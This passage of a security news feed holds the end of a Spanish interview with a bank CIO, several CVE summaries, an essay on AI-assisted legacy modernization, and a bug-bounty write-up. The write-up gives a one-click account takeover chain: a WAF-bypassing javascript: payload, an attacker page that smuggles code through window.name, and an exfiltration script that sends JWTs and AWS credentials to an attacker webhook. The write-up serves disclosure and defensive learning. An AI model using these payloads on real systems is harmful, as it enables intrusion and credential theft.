<p>Los <a href="https://www.computerworld.es/article/4188279/especial-desarrollo-de-software-2026.html">desarrolladores de software</a> son algunos de los perfiles profesionales más directamente impactados por el auge de la IA agentiva y generativa. “En el mercado en general muchos programadores ven la IA como una amenaza, pero, en realidad, esto va a hacer que se multiplique el software porque, de hecho, el mundo necesita más. Los bancos ya teníamos mucha más demanda de la que podíamos abordar. Por eso yo no veo que la IA sea un problema para los desarrolladores”.</p>



<p>Dicho esto, el CIO reconoce que el tipo de perfiles técnicos que busca la entidad en la actualidad ha cambiado: “Ahora buscamos perfiles técnicos <em>senior</em>, pues cuanta más experiencia tiene el profesional, mejor adopta la IA; también que tengan baja resistencia al cambio”. En este sentido, en el banco ya trabajan de forma que sus técnicos lideran equipos virtuales formados por los roles [agentes] de <em>project manager</em>, analista funcional, analista orgánico, etc. pero alimentados con el contexto y la arquitectura de la entidad. “Una iniciativa con la que te vuela la cabeza”, sentencia Rubén Andrés.</p>



<p>El ROI del uso de la IA asociado al área de desarrollo de ingeniería es también significativo, según el directivo. “Ahora un programador desarrolla software como si fuera un equipo de 15 desarrolladores, y lo hace a una velocidad nunca vista antes y con una calidad totalmente alineada con la requerida por el banco”.</p>



<p>El área de Tecnología de Singular Bank, cuyo equipo asciende a 41 personas, está abordando “una transformación completa de todos los sistemas <em>legacy </em>con toda esta tecnología”, recalca el CIO. “Es un catalizador del cambio”, añade.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/GARPRESS_XH2B0323.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Rubén Andrés Priego, director de Tecnología y Operaciones de Singular Bank" class="wp-image-4193890" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Garpress | Foundry</p></div>



<h2 class="wp-block-heading">Foco en la soberanía tecnológica</h2>



<p>Preguntado por si le preocupa la soberanía tecnológica en el complejo contexto actual, marcado por un escenario geopolítico tensionado, Rubén Andrés es contundente: “Mucho”. Más aún, reconoce, después de ver cómo <a href="https://www.computerworld.es/article/4185410/anthropic-desactiva-sus-modelos-de-ia-avanzados-tras-la-orden-del-gobierno-de-trump.html">el Gobierno de Estados Unidos paralizaba recientemente el acceso a los modelos más avanzados de Anthropic</a> (<a href="https://www.computerworld.es/article/4191667/ee-uu-levanta-el-veto-a-los-modelos-de-ia-fable-5-y-mythos-5-de-anthropic.html">una decisión después revertida</a>). Por ello, la filosofía del CIO es que “todo lo que construyamos permita la continuidad de negocio, es decir, el aumento de capacidades cognitivas es un ‘on top off’ de lo que son los básicos de poder llevar a cabo el asesoramiento y el resto de las tareas que hemos hecho antes de tener estos sistemas”. Además, reconoce, ya están trabajando en “desacoplar la capa agentiva. Esta pertenece a Singular Bank, es nuestra propia plataforma, a la que ponemos por encima una capa de experiencia. Ahora la capa de agentes la tenemos con tecnología de OpenAI (ChatGPT), pero se podría cambiar por <em>cloud </em>o una capa propia”.</p>



<p>Además, desvela a CIO ESPAÑA, Singular Bank está reforzando su estrategia de continuidad de negocio mediante una arquitectura multirregión en AWS que distribuye sus sistemas entre España (en Zaragoza) y el norte de Europa. El objetivo, asegura, es garantizar la resiliencia operativa y la recuperación rápida de los servicios ante incidencias graves, desde fallos técnicos hasta posibles ciberataques o eventos geopolíticos que afecten a una determinada ubicación.</p>



<figure class="wp-block-pullquote"><blockquote><p><strong><em>Singular Bank está reforzando su estrategia de continuidad de negocio mediante una arquitectura multirregión en AWS que distribuye sus sistemas entre España (en Zaragoza) y el norte de Europa</em></strong></p></blockquote></figure>



<p>Ya desde el punto de vista de la ciberseguridad, en la entidad están empleando la propia IA para crear ‘red teams’ virtuales que se encarguen de analizar continuamente la superficie de ataque y detectar posibles problemas y poder resolverlos antes de que los detecte un tercero. “La ciberseguridad nos preocupa mucho porque, al final, somos una infraestructura crítica y debemos ser responsables y tener control sobre lo que manejamos”.</p>



<p>La ventaja que aporta disponer de capacidades de análisis en ciberseguridad junto a las de un desarrollo vertiginoso facilita que “la defensa pueda abordarse de manera mucho más rápida”, reflexiona el portavoz.</p>



<p>Preguntado por cómo absorbe el banco toda la avalancha normativa que existe y si esta supone un freno a la innovación, el directivo también es claro: “Llevo trabajando en banca 20 años y nunca he visto la regulación como un freno para este sector. Honestamente, creo que este argumento se ha utilizado como excusa, pero la regulación es muy necesaria, garantiza que demos un servicio seguro y confiable”.</p>



<p>En Singular Bank, añade, “hay un equipo muy abierto a las nuevas tecnologías y a analizar la regulación desde un punto de vista más de facilitar el cambio que de bloquearlo”. “Si se adopta con sentido común y agilidad y todos los equipos del banco trabajan en pro del negocio y de la innovación esta no es un freno”.</p>



<h2 class="wp-block-heading">Aumentar la escalabilidad del banco, el eje de futuro</h2>



<p>En un futuro próximo, el equipo de Tecnología y Operaciones de Singular Bank, con Rubén Andrés al frente, proseguirá la transformación y modernización en la que está inmerso el banco. “Estamos renovando todos los sistemas <em>legacy </em>a través de tecnologías con IA y <em>context engineering</em> y, por otro lado, continuaremos trabajando la parte de agentes. Ya hemos desarrollado algunos que reemplazan o capacitan a las áreas de operaciones para poder hacer conciliaciones bancarias cada cinco minutos, mientras que antes las hacíamos cada día; esto nos permitirá aumentar la escalabilidad del banco, que es nuestro objetivo de cara a los próximos años. Y, finalmente, seguiremos apostando fuerte por las arquitecturas agentivas para poder generar experiencias de cliente mucho más naturales a través de conversaciones a través de los canales digitales”.</p>



<p>Respecto a la evolución futura del rol del CIO en general, el ejecutivo es plenamente consciente de la transformación que esta función ha tenido en los últimos años, ahora “más pegado al negocio”. “En la actualidad, se ha amplificado más el rol del CIO, que ya no está ligado a la continuidad, la resiliencia o la seguridad, sino es un rol de agente del cambio, impulsor de la adopción de nuevas tecnologías, formador, visionario de nuevos modelos de negocio… En definitiva, un rol, paradójicamente en esta era de la IA, cada vez más humano”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14684 | HdrHistogram up to 2.2.2 AbstractHistogram.java numberOfSignificantValueDigits memory allocation (Issue 220 / Nessus ID 325345)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in HdrHistogram up to 2.2.2. This affects the function org.HdrHistogram.AbstractHistogram.decodeFromByteBuffer of the file src/main/java/org/HdrHistogram/AbstractHistogram.java. This manipulation of the argument numberOfSignific...]]></description>
<link>https://tsecurity.de/de/3651451/sicherheitsluecken/cve-2026-14684-hdrhistogram-up-to-222-abstracthistogramjava-numberofsignificantvaluedigits-memory-allocation-issue-220-nessus-id-325345/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651451/sicherheitsluecken/cve-2026-14684-hdrhistogram-up-to-222-abstracthistogramjava-numberofsignificantvaluedigits-memory-allocation-issue-220-nessus-id-325345/</guid>
<pubDate>Tue, 07 Jul 2026 14:10:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/hdrhistogram">HdrHistogram up to 2.2.2</a>. This affects the function <code>org.HdrHistogram.AbstractHistogram.decodeFromByteBuffer</code> of the file <em>src/main/java/org/HdrHistogram/AbstractHistogram.java</em>. This manipulation of the argument <em>numberOfSignificantValueDigits</em> causes uncontrolled memory allocation.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-14684">CVE-2026-14684</a>. The attack can only be executed locally. Furthermore, there is an exploit available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chaining a DOM XSS Sink, WAF Bypass, Cross-Origin Smuggling, and SDK Abuse into One Click Account…]]></title>
<description><![CDATA[Chaining a DOM XSS Sink, WAF Bypass, Cross-Origin Smuggling, and SDK Abuse into One Click Account TakeoverThere’s a browser property called window.name that’s easy to overlook because it behaves differently from what most browser state does, it persists across navigations. Whatever you set it to ...]]></description>
<link>https://tsecurity.de/de/3651408/hacking/chaining-a-dom-xss-sink-waf-bypass-cross-origin-smuggling-and-sdk-abuse-into-one-click-account/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651408/hacking/chaining-a-dom-xss-sink-waf-bypass-cross-origin-smuggling-and-sdk-abuse-into-one-click-account/</guid>
<pubDate>Tue, 07 Jul 2026 13:54:50 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Chaining a DOM XSS Sink, WAF Bypass, Cross-Origin Smuggling, and SDK Abuse into One Click Account Takeover</h3><blockquote>There’s a browser property called <strong>window.name</strong> that’s easy to overlook because it behaves differently from what most browser state does, it persists across navigations. Whatever you set it to on your own page arrives intact in the next origin the tab visits, and if that origin evaluates it as code, you never had to put your payload in a URL at all. That’s the part Akamai never saw, and honestly one of the cleanest bypasses I’ve come across</blockquote><p>I’ve been hunting on this large platform’s bug bounty program on HackerOne for a while. They have a broad wildcard scope and run Akamai in front of everything meaningful. That combination produces a specific kind of bug: the sink is usually there, the WAF is usually in the way, and the interesting question is always whether you can thread the payload through the gap between them.</p><p>This writeup is about a chain that took four independent defects to complete: <em>a DOM XSS</em> sink with no scheme validation, an <em>Akamai WAF </em>rule with a structural flaw, the <em>window.name property</em>’s unusual cross-origin behavior, and a first-party <em>authentication SDK</em> that hands over signed credentials to whoever executes JavaScript in its origin. Any one of those four things is a bug report on its own. Together they were a one-click account takeover that handed me the victim’s signed JWT and live AWS STS credentials in two separate AWS accounts.</p><h3>1. Finding the Sink</h3><p>I was reading the application’s JavaScript bundles looking for <strong>open redirect sinks</strong>, anything that consumes a URL parameter and passes it directly to location.assign, location.replace, or location.href. The error-page component stood out immediately.</p><p>The application handles a set of named error conditions, clock drift, filter failures, auth service timeouts, with a shared React component that renders a user-facing message and an action button. The button’s onClick handler reads a <strong>backURL query parameter </strong>and calls <strong>window.location.assign</strong> on it. Here’s the relevant function from the minified production bundle:</p><pre>A = function(e){<br>var r = e.id, t = (0, k.zy)(), n = new URLSearchParams(t.search);<br>function o(e){<br>e.preventDefault();<br>var r = n.get("backURL");<br>("Reload Page" !== f &amp;&amp; "Please try again." !== f) || !r<br>? window.location.assign(g || t.pathname)<br>: window.location.assign(r); // no validation<br>}<br>var s = O.$D[r], u = s.img, d = s.title, p = s.description, f = s.action, g = s.linkText;<br>return …&lt;button onClick={o}&gt;{f}&lt;/button&gt;…;<br>}</pre><p>window.location.assign executes a javascript: URL synchronously in the calling document’s origin. There is no scheme check, no host check, no sanitization. The only gate is that the button’s action label must be “<em>Reload Page</em>” or “<em>Please try again.</em>”, determined by the error type in the URL path, for the dangerous branch to run.</p><p>The cleanest entry point was an error path whose rendered button reads <em>“Reload Page”</em> and presents itself as a routine timing error. Nothing suspicious about the URL bar. It’s a real application domain throughout.</p><p>The sink is there. The problem is getting a javascript: payload through Akamai.</p><h3>2. The Wall</h3><p>Akamai’s WAF sits in front of the application. Send backURL=javascript:alert(1) and you get HTTP 403. Expected. The interesting question is what the rule actually looks like.</p><p>I started mapping it <strong>systematically</strong>, every encoding trick I knew:</p><pre>javascript:alert(1) → 403<br>javascript:alert%28%29 → 403 (percent-encoded parens)<br>javascript:%2528%2529 → 403 (double-encoded)<br>javascript:eval(name) → 403<br>javascript:Function(name)() → 403<br>javascript:setTimeout(name) → 403<br>javascript:[].constructor.constructor(name)() → 403<br>javascript:({}).valueOf.constructor(name)() → 403<br>javascript:new Function(name)() → 403<br>javascript:document.body.innerHTML=… → 403<br>javascript:location='https://…' → 403<br>javascript:alert(1) → 403 (unicode escapes)<br>java%E2%80%8Bscript:alert(1) → 403 (zero-width space)<br>java%C0%80script:alert(1) → 403 (overlong UTF-8)</pre><p>Getter tricks, backtick calls, throw expressions. All 403. After about eighty probes I stopped trying variants and started looking at the data differently. I wrote down what every blocked payload had in common, and separately what every passing payload had in common.</p><p>The passing ones:</p><pre>javascript:top[name](1) → 200<br>javascript:[name].forEach(top[name]) → 200<br>javascript:Promise.resolve(name).then(top[name]) → 200<br>javascript:Reflect.apply(top[name],null,[1]) → 200</pre><p>Every blocked payload had a JavaScript keyword sitting directly adjacent to an opening parenthesis. alert(, eval(, Function(, setTimeout(. Every passing payload had some non-whitespace token between the keyword and the paren. Akamai’s rule appeared to be a regex matching keyword immediately followed by a paren, with optional whitespace in between. Insert anything else between the keyword and the call and the rule never fires.</p><h3>3. The Payload</h3><p>The winning payload was :</p><pre>javascript:top["setTimeout"](name)</pre><p><em>top[“setTimeout”] </em>is property-access syntax. Akamai sees no keyword adjacent to a paren, so the request passes with HTTP 200. The browser resolves top[“setTimeout”] to window.setTimeout. Then it calls it with window.name as the argument. setTimeout with a string argument evaluates that string as JavaScript, same behavior as eval, without the word eval appearing anywhere in the URL.</p><p>What makes this composable is what <strong>window.name</strong> actually is. It’s a per-tab string property that survives cross-origin navigation. When a user follows a link from attacker.example.com to the target application, the tab’s window.name carries over. It’s not governed by the same-origin policy. It belongs to the tab, not the document. So I set window.name to any JavaScript I want on my own page, then redirect the user to the vulnerable error URL. The payload is never in the URL, never inspected by Akamai. The URL contains only the harmless-looking dispatcher.</p><p>The attacker page is four lines:</p><pre>&lt;!DOCTYPE html&gt;<br>&lt;html&gt;&lt;body&gt;<br>&lt;script&gt;<br>window.name = "alert('XSS in ' + document.domain)";<br>location.href =<br>"https://app.[target].com/[feature]/error/clock-sync"<br>+ "?backURL=javascript:top%5B%22setTimeout%22%5D(name)";<br>&lt;/script&gt;<br>&lt;/body&gt;&lt;/html&gt;</pre><p>Victim lands on the attacker page, gets redirected to a real application URL, sees a <em>“Time Sync Error”</em> page with a Reload Page button, and <strong>clicks it</strong>. JavaScript executes in the target origin. Confirmed from a live run:</p><pre>[XSS-FIRED] alert: XSS in app.[target].com cookie=[session]=…</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/912/1*_osiOoYxPpI6pOCZ1NMMxw.png"></figure><h3>4. The SDK</h3><p>Arbitrary code execution in the target origin is already a serious finding. But the application loads something that turns it into a much bigger problem.</p><p>Every page on this platform loads two SDK bundles from the platform’s own CDN. Together they install a global authentication object on the window with 21 methods. The ones that matter here:</p><pre>[platform].core.iam.getAuthSession() // full session metadata + profile<br>[platform].core.iam.getJWTToken() // signed platform JWT<br>[platform].core.iam.getTempAWSCreds(domain) // live AWS STS temporary credentials<br>[platform].core.iam.getCatapultId() // Cognito identity pool ID</pre><p>These methods make credentialed XHR calls back to the platform’s IAM endpoints with credentials included. The browser attaches the session cookie to those requests automatically, even if the cookie is HttpOnly. The SDK functions return the IAM responses directly to the calling JavaScript.</p><p><strong>The SDK is the cookie.</strong> You don’t need to read document.cookie. You call getTempAWSCreds() and it comes back with an access key ID, a secret, and a session token. The platform exposes two different AWS domains to standard user accounts. Two separate AWS accounts.</p><h3>5. The Chain</h3><p>The payload that runs inside the target origin once window.name is evaluated:</p><pre>(async function() {<br>var h = 'https://[ATTACKER-WEBHOOK]';<br>var send = function(label, data) {<br>return fetch(h, {<br>method: 'POST', mode: 'no-cors',<br>headers: {'Content-Type': 'text/plain'},<br>body: JSON.stringify({ label: label, origin: document.domain, cookies: document.cookie, data: data })<br>});<br>};<br>await send('handshake', 'fired in ' + document.domain);<br>var s = [platform].core.iam.getAuthSession();<br>await send('session', s);<br>await send('jwt', await [platform].core.iam.getJWTToken());<br>await send('aws_a', await [platform].core.iam.getTempAWSCreds('[aws-domain-a]'));<br>await send('aws_b', await [platform].core.iam.getTempAWSCreds('[aws-domain-b]'));<br>}());</pre><p>The attacker page that delivers it. The payload above is serialized into window.name as a plain string, then the victim is redirected. Since window.name persists across navigations, it arrives intact in the target origin where setTimeout evaluates it.</p><pre>&lt;!DOCTYPE html&gt;<br>&lt;html&gt;&lt;body&gt;<br>&lt;script&gt;<br>window.name = "(async function(){ /* payload above */ }())";<br>location.href =<br>"https://app.[target].com/[feature]/error/clock-sync"<br>+ "?backURL=javascript:top%5B%22setTimeout%22%5D(name)";<br>&lt;/script&gt;<br>&lt;/body&gt;&lt;/html&gt;</pre><p>I ran this against my own test account. Nine POSTs <strong>hit the webhook</strong> in 8 seconds.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Poy5ue-iFeXbfYJI-5IQag.png"></figure><p>The session object came back with the <strong>full profile</strong>: first name, username, account namespace, account type, plus a session UUID. <strong>The JWT</strong> was 1488 characters, RS256, signed by the platform’s auth service, accepted as bearer credentials at every platform API for roughly 15 minutes. Its decoded payload included the victim’s legal name, email, home address, graduation date, and cohort year, all regulated education records, potentially belonging to a minor.</p><p>Then <strong>the AWS credentials</strong>. The first set resolved to a named user IAM role in one AWS account. The second set, confirmed by a different key ID prefix and a distinct account identifier in the token metadata, came from a completely separate AWS account. Both arrived from a single javascript: URL, via a button labeled <em>“Reload Page,”</em> on a page that looked entirely legitimate.</p><h3>6. Four Bugs, Not One</h3><p>The chain works because four things fail at the same time, each independently.</p><p>The first is the <strong>sink</strong> itself. The error page reads backURL from the query string and passes it directly to window.location.assign without checking the scheme. The fix is straightforward: parse the value with new URL() and reject anything whose protocol field isn’t https. That one change kills the entire chain regardless of what the WAF does or doesn’t do.</p><p>The second is the <strong>WAF rule.</strong> Akamai’s pattern matches a keyword directly adjacent to an opening paren. It has no awareness of property-access syntax, so top[“setTimeout”], where the keyword appears inside a string accessed via bracket notation, doesn’t trigger it. A rule that rejects any request URL whose scheme is javascript: outright, regardless of the surrounding syntax, would close this. But as I found over eighty probes, a regex-based keyword-paren rule has a structural hole.</p><p>The third is <strong>window.name</strong>. This is documented browser behavior. window.name is intentionally cross-origin, a design decision from before postMessage existed, when developers needed a way to pass data across frames. There’s no browser-level fix for this. The only mitigation is making sure the application sink isn’t exploitable in the first place, because once the sink is gone there’s nothing for the smuggling channel to deliver to.</p><p>The fourth is the <strong>auth SDK</strong>. When a platform loads authentication logic as a global object on every page, any XSS anywhere in its wildcard scope becomes a full credential theft, not just a session hijack. Cookie flags are irrelevant when the SDK makes credentialed requests on your behalf and returns the credentials directly to the executing script. The payload sitting in window.name, all 1896 characters of it, never appeared in the request that passed through Akamai. The URL that did pass through was clean.</p><h3>Takeways</h3><p>The useful thing was not the string.</p><p>The useful thing was the model.</p><blockquote>When every encoding trick returns 403, probing more variants is usually the wrong level of work. <strong>Model the rule</strong>. The key observation was not “this payload works.” It was “the blocked payloads all have keyword-call adjacency, and the passing payloads all break that adjacency.”</blockquote><p>window.name remains worth keeping in mind for javascript URL sinks because it separates transport from payload. The WAF sees the dispatcher. The tab carries the code.</p><p>Global auth SDKs change XSS severity. If the page exposes methods that mint JWTs, temporary AWS credentials, signed API requests, or profile objects, the question is no longer only “can I steal the cookie?” The better question is what the platform already exposes to JavaScript after login.</p><p>The reload button did exactly what the developers asked it to do. It reloaded the user toward a URL from the query string.</p><p>The browser supplied the rest.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=6c1a7095f8e1" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/chaining-a-dom-xss-sink-waf-bypass-cross-origin-smuggling-and-sdk-abuse-into-one-click-account-6c1a7095f8e1">Chaining a DOM XSS Sink, WAF Bypass, Cross-Origin Smuggling, and SDK Abuse into One Click Account…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-21952 | SUSE Manager Server 4.1/4.2 spacewalk-java resource consumption]]></title>
<description><![CDATA[A vulnerability was found in SUSE Manager Server 4.1/4.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component spacewalk-java. The manipulation results in resource consumption.

This vulnerability was named CVE-2022-21952. The attack may...]]></description>
<link>https://tsecurity.de/de/3651290/sicherheitsluecken/cve-2022-21952-suse-manager-server-4142-spacewalk-java-resource-consumption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651290/sicherheitsluecken/cve-2022-21952-suse-manager-server-4142-spacewalk-java-resource-consumption/</guid>
<pubDate>Tue, 07 Jul 2026 13:09:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/suse:manager_server">SUSE Manager Server 4.1/4.2</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the component <em>spacewalk-java</em>. The manipulation results in resource consumption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-21952">CVE-2022-21952</a>. The attack may be performed from remote. There is no available exploit.

Applying a patch is advised to resolve this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Modernizing legacy IT with AI without triggering regulatory risk]]></title>
<description><![CDATA[AI is accelerating modernization projects that previously required months of analysis. But in highly regulated organizations, an uncomfortable reality quickly emerges: The risk is no longer in converting the code, but in demonstrating that the new version still does exactly what the old one did.
...]]></description>
<link>https://tsecurity.de/de/3651034/it-security-nachrichten/modernizing-legacy-it-with-ai-without-triggering-regulatory-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651034/it-security-nachrichten/modernizing-legacy-it-with-ai-without-triggering-regulatory-risk/</guid>
<pubDate>Tue, 07 Jul 2026 11:36:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI is accelerating modernization projects that previously required months of analysis. But in highly regulated organizations, an uncomfortable reality quickly emerges: The risk is no longer in converting the code, but in demonstrating that the new version still does exactly what the old one did.</p>



<p>Almost every management committee has made the same decision this year: to apply artificial intelligence to their systems. And almost all discover the same thing when they delve into the details: AI is easy to add to the periphery — a chatbot, a copilot, a dashboard — and very difficult to integrate where it really matters, which is the legacy core. In banking, insurance, and much of the public sector, that core is still COBOL on a mainframe, with decades of patches and documentation that, to put it mildly, is incomplete.</p>



<p>That’s precisely where the regulatory risk lies. And that’s where most projects go off the rails.</p>



<p>I’ve spent three decades in regulated sectors, and the pattern repeats itself. The IT team approaches modernization as a delivery problem — deliver quickly, close tickets, move to production — when in a regulated sector, the problem is compliance. Success isn’t measured by what you deliver, but by what you can defend. Changing that mindset is half the battle.</p>



<h2 class="wp-block-heading">The mirage of COBOL translated</h2>



<p>The promise is enticing. Today, a language model can read thousands of lines of COBOL, document them, explain them, and propose an equivalent in Java or Python in a fraction of the time it would take a human team. It works. I’ve seen it accelerate analyses that previously took weeks.</p>



<p>The problem isn’t the code. The problem is the business rules that no one ever wrote down. In a migration project in a highly regulated banking environment, the biggest risk wasn’t in the routines, but in a calculation exception that had been running for 15 years and wasn’t documented anywhere: It existed only in the code and in the mind of a now-retired analyst. When you ask a model to “translate” that, it doesn’t translate; it fills in the gap with what statistically seems correct. And it does so with impeccable certainty.</p>



<p>On a dashboard, a hallucination is a troublesome error. In a financial institution’s calculation engine, it’s a compliance incident, a customer complaint, and potentially a penalty from the regulator.</p>



<p>The temptation, precisely because the tool is so fast, is to skip the slow part: reconstructing that logic with someone who understands it. That’s the worst possible decision. The speed of AI is seductive precisely at the point where making a mistake is most costly.</p>



<h2 class="wp-block-heading">What the regulator expects — and what changed in May</h2>



<p><a href="https://www.csoonline.com/article/570091/eus-dora-regulation-explained-new-risk-management-requirements-for-financial-firms.html">DORA</a> has been in effect since January 2025 and is very clear: operational resilience, ICT asset management, business continuity, and third-party risk control. Modernizing the core addresses all four areas simultaneously. NIS2 adds the security and notification layer. And the AI ​​Regulation introduces its own framework when the system you deploy is high-risk.</p>



<p>Although DORA, <a href="https://www.csoonline.com/article/3568787/eus-nis2-directive-for-cybersecurity-resilience-enters-full-enforcement.html">NIS2</a>, and the EU AI ​​Regulation pursue different objectives, they share a common requirement: the ability to demonstrate control, traceability, and accountability over deployed systems. This is the link between the three frameworks, and it’s what a modernization project must protect from day one.</p>



<p>It’s important to clear up a recent misunderstanding here. With the <a href="https://data.europa.eu/en/news-events/news/eu-digital-omnibus-update-simplifying-europes-digital-rulebook" target="_blank" rel="nofollow">Digital Omnibus</a> agreement of May 2026, the high-risk obligations of Annex III are postponed until December 2027. Many executives have interpreted the headline — “EU delays AI Law” — as a reprieve. This is a dangerous interpretation. Transparency obligations still apply in August 2026, synthetic content marking comes into effect in December 2026, and, most importantly, the underlying risk remains unchanged. An erroneous automated decision in 2026 still falls under the GDPR, under sector-specific regulations, and under the jurisdiction of the relevant supervisor. The deadline has been moved; the responsibility has not.</p>



<h2 class="wp-block-heading">How to do it without triggering the risk</h2>



<p>I don’t have a magic formula, but I do have five principles that I apply to every project of this type:</p>



<ol class="wp-block-list">
<li><strong>Inventory before modernizing.</strong> You can’t secure or migrate what hasn’t been mapped. Assets, dependencies, data flows: If that map doesn’t exist, the first deliverable of the project is to build it, not write code.</li>



<li><strong>The AI </strong><strong>​​proposes, a person validates.</strong> The model accelerates the analysis and the first draft of the transformation. The critical business rule is confirmed by an engineer who understands the business, not the model. Where there is no one who understands it, it is reconstructed with the business area before anything is changed.</li>



<li><strong>End-to-end traceability.</strong> Every AI-generated transformation must be recorded: what went in, what went out, who approved it, and why. That’s not bureaucracy; it’s exactly what the auditor will ask for, and it’s what makes a change defensible.</li>



<li><strong>Be careful where you put the code.</strong> Dumping kernel source code into an external model is a data transfer and a confidentiality issue more than a technical one. DORA requires control over the third party; GDPR requires control over the data. This decision is made at the beginning of the project, not after it’s finished.</li>



<li><strong>Govern shadow AI.</strong> If the organization doesn’t offer a safe way to use AI, teams will use it anyway, on their own and without oversight. Governance isn’t about prohibition but about providing an enabled path.</li>
</ol>



<h2 class="wp-block-heading">Technological leadership has changed</h2>



<p>In a regulated sector, the CIO’s challenge is no longer simply to modernize legacy systems, but to do so in a way that withstands the scrutiny of auditors, regulators, and risk committees.</p>



<p>Leading one of these projects is no longer about coordinating deliveries; it’s about making the transformation defensible. It means saying no to a shortcut that would save two weeks but leave a gap without traceability. It means treating governance as an accelerator — because a well-documented change is approved faster — and not a brake.</p>



<p>AI is an extraordinary tool for organizations to overcome their legacy technical debt. But in banking, insurance, or public administration, uncontrolled speed is not an advantage: It’s a liability that surfaces at first inspection. Modernizing quickly can be a competitive advantage; modernizing with traceability, control, and defense capabilities is what makes it sustainable.</p>



<p>Therefore, I summarize what I’ve learned over the years as the following: A secure solution isn’t the slowest or the most expensive; it’s the one that survives the first audit.</p>



<p><em><a href="https://joseenrique.es/" rel="nofollow">José Enrique Ibarra</a> is Interim CIO and AI Project Manager, with three decades of experience leading IT in regulated sectors—banking, insurance, energy, and public administration. His focus is on governing digital transformation and AI adoption under the AI </em><em>​​Regulation, DORA, NIS2, GDPR, ISO 27001, and the Spanish National Security Framework (ENS), ensuring it withstands the scrutiny of auditors and regulators. He leads AI Forge, his applied AI initiative. He resides in Almería.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14686 | HdrHistogram up to 2.2.2 Range Check DoubleHistogram.java org.HdrHistogram.DoubleHistogram.recordValue comparison (Issue 222 / Nessus ID 325354)]]></title>
<description><![CDATA[A vulnerability has been found in HdrHistogram up to 2.2.2 and classified as problematic. This issue affects the function org.HdrHistogram.DoubleHistogram.recordValue of the file src/main/java/org/HdrHistogram/DoubleHistogram.java of the component Range Check. Performing a manipulation results in...]]></description>
<link>https://tsecurity.de/de/3650830/sicherheitsluecken/cve-2026-14686-hdrhistogram-up-to-222-range-check-doublehistogramjava-orghdrhistogramdoublehistogramrecordvalue-comparison-issue-222-nessus-id-325354/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650830/sicherheitsluecken/cve-2026-14686-hdrhistogram-up-to-222-range-check-doublehistogramjava-orghdrhistogramdoublehistogramrecordvalue-comparison-issue-222-nessus-id-325354/</guid>
<pubDate>Tue, 07 Jul 2026 10:06:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/hdrhistogram">HdrHistogram up to 2.2.2</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects the function <code>org.HdrHistogram.DoubleHistogram.recordValue</code> of the file <em>src/main/java/org/HdrHistogram/DoubleHistogram.java</em> of the component <em>Range Check</em>. Performing a manipulation results in incorrect comparison.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-14686">CVE-2026-14686</a>. The attack is only possible with local access. Additionally, an exploit exists.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Seis nuevas reglas del liderazgo en TI… y a cuáles sustituyen]]></title>
<description><![CDATA[La IA está cambiando la forma en que se realiza el trabajo y quién lo lleva a cabo, en todos los niveles de la organización. Esto significa que también está cambiando la forma en que los ejecutivos desempeñan su labor y cómo deben liderar, ya que ahora se les pide que utilicen la IA para reinvent...]]></description>
<link>https://tsecurity.de/de/3650645/it-nachrichten/seis-nuevas-reglas-del-liderazgo-en-ti-y-a-cules-sustituyen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650645/it-nachrichten/seis-nuevas-reglas-del-liderazgo-en-ti-y-a-cules-sustituyen/</guid>
<pubDate>Tue, 07 Jul 2026 08:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
